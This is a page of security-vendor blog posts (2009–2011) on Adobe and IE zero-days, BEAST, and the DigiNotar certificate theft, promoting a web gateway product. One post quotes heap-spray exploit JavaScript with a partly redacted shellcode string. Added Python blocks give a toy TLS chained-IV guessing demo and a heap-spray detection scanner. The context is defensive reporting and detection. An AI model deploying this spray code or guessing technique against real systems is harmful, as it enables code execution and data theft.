Posts Tagged ‘SWG’

A new Adobe 0-day In the Wild – But No Worries, You are Already Protected with Our Secure Web Gateway!

By Anat Davidi  •  December 7th, 2011  •   Vulnerabilities

Yesterday Adobe released an advisory for a vulnerability in the Adobe Reader and Adobe Acrobat products. The vulnerability, titled ‘U3D Memory Corruption Vulnerability’, was used in a targeted attack and was discovered by Lockheed Martin’s Computer Incident Response Team. This is not the first time a targeted attack has been aimed at the US defense industry.

This attack involves embedding a maliciously crafted Universal 3D (U3D) stream in a PDF file. It is one of several examples of attacks on embedded streams within PDF files, and it represents a growing attack vector because such attacks can bypass defense mechanisms such as DEP and ASLR (two techniques meant to help prevent unauthorized code execution) using known techniques such as JIT spraying.

According to Adobe’s blog post released alongside the advisory, Adobe is planning to release an update for Adobe Reader 9, the version targeted by this vulnerability, “no later than the week of December 12, 2011”. The rest of its supported versions will receive updates as part of their quarterly updates in January 2012.

M86 Secure Web Gateway, version 9.2 and above, provides zero-day protection against this attack, without requiring any further updates. Customers who wish to monitor the attack in their organization may look for attacks that are tagged with the “Adobe Universal 3D streams” block message.

We’re proud that our proactive rules block this new zero-day exploit and we’ll continue to work hard to provide this level of protection to our customers in the future.

The Beauty and the BEAST

By Avri Schneider  •  September 28th, 2011  •   General

Transport Layer Security (TLS) is a protocol often used in HTTPS connections to secure web sites. For almost a decade it has been known that TLS 1.0 was insecure and vulnerable to attack, primarily because of its use of the Cipher Block Chaining (CBC) mode of operation. TLS version 1.1 and then TLS version 1.2 were designed to cope with this and other weaknesses.

The theoretical attack published by Gregory V. Bard back in April 2006 has since been exploited (although not in the wild), and a proof-of-concept has recently been developed. Just a little over a week ago, researchers Thai Duong and Juliano Rizzo demonstrated their proof-of-concept called BEAST (Browser Exploit Against SSL/TLS), and a few days ago they published a blog post describing the attack in detail.

Even though Microsoft, Google, Mozilla and Opera have already released information or fixes for this issue, it is surprising that Internet Explorer, Chrome, Firefox and Opera, all recent web browsers, left this vulnerability unpatched for so long, leaving many users exposed to precisely the type of attack SSL was designed to protect against.

OpenSSL has implemented a workaround for this vulnerability since version 0.9.6d, released in May 2002; however, some browsers use the Network Security Services (NSS) library, which remained vulnerable to this attack.
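The chained-IV weakness behind BEAST, and why an explicit per-record IV removes it, as an added illustration that is not part of the original post. It uses a SHA-256-based stand-in for the block cipher (an assumption; only the forward direction is needed) and models the TLS 1.0 and TLS 1.1 record layers only as far as the distinguishing test requires; the OpenSSL and NSS mitigations themselves are not modelled.

```python
import hashlib
import os
BLOCK = 16

def toy_block_encrypt(key, block):
    # Stand-in for the block cipher (assumption): a keyed PRF suffices, since CBC only needs the forward direction.
    return hashlib.sha256(key + block).digest()[:BLOCK]

xor = lambda a, b: bytes(x ^ y for x, y in zip(a, b))

def cbc_encrypt(key, iv, plaintext):
    # CBC: C_i = E(P_i XOR C_{i-1}) with C_0 = IV; plaintext is a block multiple.
    prev, out = iv, b""
    for i in range(0, len(plaintext), BLOCK):
        prev = toy_block_encrypt(key, xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out

class Tls10Records:
    # TLS 1.0 style: a record's IV is the previous record's last ciphertext block, visible on the wire.
    def __init__(self, key):
        self.key, self.next_iv = key, os.urandom(BLOCK)
    def send(self, plaintext):
        ct = cbc_encrypt(self.key, self.next_iv, plaintext)
        self.next_iv = ct[-BLOCK:]
        return ct

class Tls11Records:
    # TLS 1.1 style: a fresh random IV per record, sent explicitly in front of it (not knowable in advance).
    def __init__(self, key):
        self.key, self.next_iv = key, None
    def send(self, plaintext):
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.key, iv, plaintext)

def block_guess_confirmed(records, observed, j, guess):
    # Observer's test for block j >= 1 of an observed record: one chosen block
    # P* = guess XOR C_{j-1} XOR IV_next encrypts to C_j exactly when guess == P_j.
    # With explicit random IVs only a stale IV_next is available, so the test fails even for the correct guess.
    c_prev, c_j = observed[(j - 1) * BLOCK:j * BLOCK], observed[j * BLOCK:(j + 1) * BLOCK]
    iv_next = records.next_iv if records.next_iv is not None else observed[-BLOCK:]
    probe = records.send(xor(xor(guess, c_prev), iv_next))
    return probe[-BLOCK:] == c_j

def demo(record_layer):
    session = record_layer(os.urandom(BLOCK))
    secret = b"cookie=SECRETVAL" + b"session-part-two"   # constructed two-block record
    observed = session.send(secret)[-len(secret):]       # drop the explicit IV, if any
    return (block_guess_confirmed(session, observed, 1, b"session-part-two"),   # right guess
            block_guess_confirmed(session, observed, 1, b"session-part-TWO"))   # wrong guess
```

`demo(Tls10Records)` returns `(True, False)`: with chained IVs a single chosen record confirms or refutes a guess for an earlier block, while `demo(Tls11Records)` returns `(False, False)` because the IV is no longer known when the plaintext is chosen.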

The beauty is that the M86 Secure Web Gateway appliance, in its default configuration, provides zero-day protection against this and other types of attack.

The complexity, time and cost of keeping all browsers in an organization patched against all the latest security threats highlights the importance of not relying solely on client-side security solutions.

Regardless of whether the browsers behind the Secure Web Gateway get patched, and how quickly that happens, they are protected by the M86 Security Secure Web Gateway.

DigiNotar Certificates Revoked Following Theft

By Anat Davidi  •  September 13th, 2011  •   General

Last year, as we considered possible future threats, one of our predictions for 2011 was that the use of stolen digital certificates would become increasingly common. We envisioned malicious websites and applications being signed with stolen digital certificates and accepted as valid by products and applications that fail to keep up to date with such events. It appears that our prediction is becoming a reality as we see more and more cases of stolen certificates.

Recently, certificates belonging to a Certification Authority by the name of DigiNotar were stolen. These were used to issue hundreds of certificates, among them a certificate for the domain *.google.com, which was used to carry out Man-in-the-Middle attacks against users of encrypted Google services.

Following this incident, companies such as Microsoft, Google and Mozilla have all taken action to protect their respective products.

M86 Security has issued a Security Update for our Secure Web Gateway product, moving the five stolen root certificates to the untrusted list:

  • DigiNotar Root CA
  • DigiNotar Root CA G2
  • DigiNotar PKIoverheid CA Overheid
  • DigiNotar PKIoverheid CA Organisatie – G2
  • DigiNotar PKIoverheid CA Overheid en Bedrijven

Given that some of these certificates are already being used in active attacks, customers are strongly advised to install this update (M86 Security Update 120).

With the update installed, Secure Web Gateway clients will be protected against malicious files signed with certificates issued by this Certification Authority in an attempt to appear legitimate, as well as against Man-in-the-Middle attacks on users of various encrypted services. Both will be blocked with a digital certificate violation.

To verify that the update has been installed and to observe the changes to Secure Web Gateway’s digital certificates, customers may inspect the product’s web administration interface under Administration > System Settings > Digital Certificates. Here customers will see that the certificates have been removed from “M86 Security Trusted Root CA” and can now be found under “M86 Security Untrusted Publishers”.

Secure Web Gateway Digital Certificates - "M86 Security Untrusted Publishers" list contains the five DigiNotar certificates

M86 Security will continue to keep track of the situation and take actions as necessary to keep our customers safe.

Finjan prevents 0-day exploit of Adobe Acrobat Reader and Flash player vulnerability

By Anonymous  •  July 23rd, 2009  •   Vulnerabilities

Finjan’s Malicious Code Research Center (MCRC) has detected yet another 0-day attack “in the wild”. This time, hackers are exploiting a vulnerability (CVE-2009-1862) in Adobe Acrobat/Reader and Flash Player. By exploiting this vulnerability, the hackers can download and execute malicious code on the victim’s PC. According to Adobe, an update will be available only on July 31, 2009, leaving end users’ PCs unprotected in the meantime.
As with the previous 0-day attacks we reported, Finjan’s unified Secure Web Gateway (SWG) successfully detected and prevented the attempt to exploit the vulnerability and execute code. Using its patented real-time content inspection technology, Finjan’s SWG proactively prevented the attack without any update.
As the MCRC research discovered, the attack is being served from a compromised website containing a script tag that loads the exploit from a remote malicious server. The malicious script uses a heap spray technique to place the attack shellcode in memory and then loads a malformed Flash file that triggers the vulnerability.
Following is a code snippet of the malicious script:

Another interesting aspect of this exploit is that the shellcode embedded in the script loads an obfuscated executable. This simple obfuscation is done to evade detection by signature-based security products. The downloaded malicious executable creates a Trojan DLL named “wmimachine2.dll” and registers it as a service on the victim’s PC.
When we submitted the exploit to VirusTotal, none of the 40 anti-virus products detected it as malicious.

Submitting the malicious script gave a similar result: no detection.

Submitting the malicious Flash file gave the same result: no detection.

Submitting the obfuscated payload gave the same result: no detection.
When browsing to the compromised site serving the 0-day attack through Finjan’s unified Secure Web Gateway, users are protected, as can be seen below:
 
Posted by Golan Yosef

Finjan Prevents PDF Zero-Day Exploit “in the wild”

By Anonymous  •  February 24th, 2009  •   Vulnerabilities

Since December 2008, the security community has reported 3 zero-day attacks. We at Finjan are pleased to announce that our brand new unified Secure Web Gateway, using our patented active real-time content inspection technology, proactively prevents all 3 attacks, without the need for a product update.
The newest zero-day attack exploits a critical vulnerability in Adobe Acrobat Reader (PDF). It has been circulating on the web since last weekend. The malicious PDF exploits a buffer overflow vulnerability in version 9.0 and earlier of the Adobe Reader application.
This is not the first time we have seen abuse of PDF’s ability to include JavaScript code. In this case the JavaScript code injects shellcode using the heap spraying technique.

<>
stream
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%[REMOVED]%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%[REMOVED]%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%[REMOVED]%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");   // payload, partly redacted in the post
bigblock = unescape("%u0D0D%u0D0D");                         // filler pattern used to pad every block
headersize = 20;
slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;   // grow the filler until it covers header + payload
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;   // build one large block of 0x40000 characters
memory = new Array();
for (i = 0; i < 700; i++) memory[i] = block + shellcode;   // spray 700 copies of filler + payload across the heap
endstream
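A heuristic scanner for the heap-spray pattern seen in this PDF stream and in the Flash post above, as an added example of the kind of content inspection such posts describe (not Finjan's technology or code). It assumes the JavaScript is stored uncompressed inside the PDF; the sample input is constructed from the snippet quoted here, with most of the shellcode elided.

```python
import re

# Constructed test input modelled on the PDF stream quoted above (shellcode mostly elided).
SPRAY_STREAM = r'''
var shellcode=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u31ee%u99c0");
bigblock = unescape("%u0D0D%u0D0D");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<700;i++) memory[i] = block + shellcode;
'''
# Constructed benign form script: it also calls unescape(), which alone must not trigger.
BENIGN_STREAM = r'''
var f = this.getField("total");
f.value = app.viewerVersion + " " + unescape("%20ok");
'''
# Constructed minimal PDF carrying the spray as an uncompressed JavaScript stream.
SAMPLE_PDF = (b"%PDF-1.4\n4 0 obj << /S /JavaScript /JS 5 0 R >> endobj\n5 0 obj << /Length 500 >>\n"
              b"stream" + SPRAY_STREAM.encode() + b"endstream\nendobj\n")

# Heuristic indicators.  A heap spray needs all of: a %u-encoded payload, a repeated
# filler/sled block, a string that doubles itself in a loop up to a large size, and a
# loop that stores payload copies into an array.  Scoring on the combination keeps the
# ordinary unescape() call in a form script from firing.
INDICATORS = [
    ("unescape_unicode_payload", re.compile(r'unescape\(\s*["\'](?:%u[0-9a-fA-F]{4}){8,}')),
    ("repeated_filler_block",    re.compile(r'unescape\(\s*["\'](%u[0-9a-fA-F]{4})\1+["\']')),
    ("self_doubling_loop",       re.compile(r'while\s*\([^)]*\)\s*(\w+)\s*(?:\+=\s*\1|=\s*\1\s*\+\s*\1)\b')),
    ("large_size_target",        re.compile(r'<\s*0x[0-9a-fA-F]{5,}', re.I)),
    ("array_fill_with_payload",  re.compile(r'for\s*\([^)]*\)\s*(\w+)\[\w+\]\s*=\s*\w+\s*\+\s*\w+')),
]

def score_script(js):
    # Returns which indicators fired and a verdict; three or more is treated as a spray.
    hits = [name for name, rx in INDICATORS if rx.search(js)]
    return {"hits": hits, "heap_spray": len(hits) >= 3}

def extract_streams(pdf_bytes):
    # Bodies of stream ... endstream objects.  Real scanners must first undo /FlateDecode
    # and other filters; this assumes the JavaScript is stored uncompressed, as in the post.
    return [m.group(1).decode("latin-1")
            for m in re.finditer(rb"\bstream\r?\n(.*?)\r?\nendstream", pdf_bytes, re.S)]

def scan_pdf(pdf_bytes):
    # One verdict per stream, so a blocking decision can name the offending object.
    return [score_script(js) for js in extract_streams(pdf_bytes)]
```

`scan_pdf(SAMPLE_PDF)` flags the single stream with all five indicators, while `score_script(BENIGN_STREAM)` fires none of them.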

At this point our active real-time content inspection technology kicks in: 
 
Although Adobe is about to release a patch at the beginning of March, users of Finjan’s new unified Secure Web Gateway are already well protected.
Posted by Vadim Pogulievsky

Finjan prevents exploits for MS09-002 found “in the wild”

By Anonymous  •  February 24th, 2009  •   Vulnerabilities

As with the IE7 zero-day exploit (CVE-2008-4844) disclosed in December 2008, Finjan’s active real-time content inspection technology also prevents attempts to exploit the recently patched IE7 vulnerability (MS09-002, CVE-2009-0075) without any product update; this is what we call Proactive Web Security.
The exploit was detected and blocked by our patented active real-time content inspection technology, which inspected the incoming code and detected suspicious computer operations in real time.
Following is a code snippet of the exploit we found “in the wild”: 
 
Below is how our product responds when a user visits a web page infected with this code. A customer can, of course, customize this message or simply redirect the user to a different landing page.
 
Stay safe! 
Posted by Golan Yosef
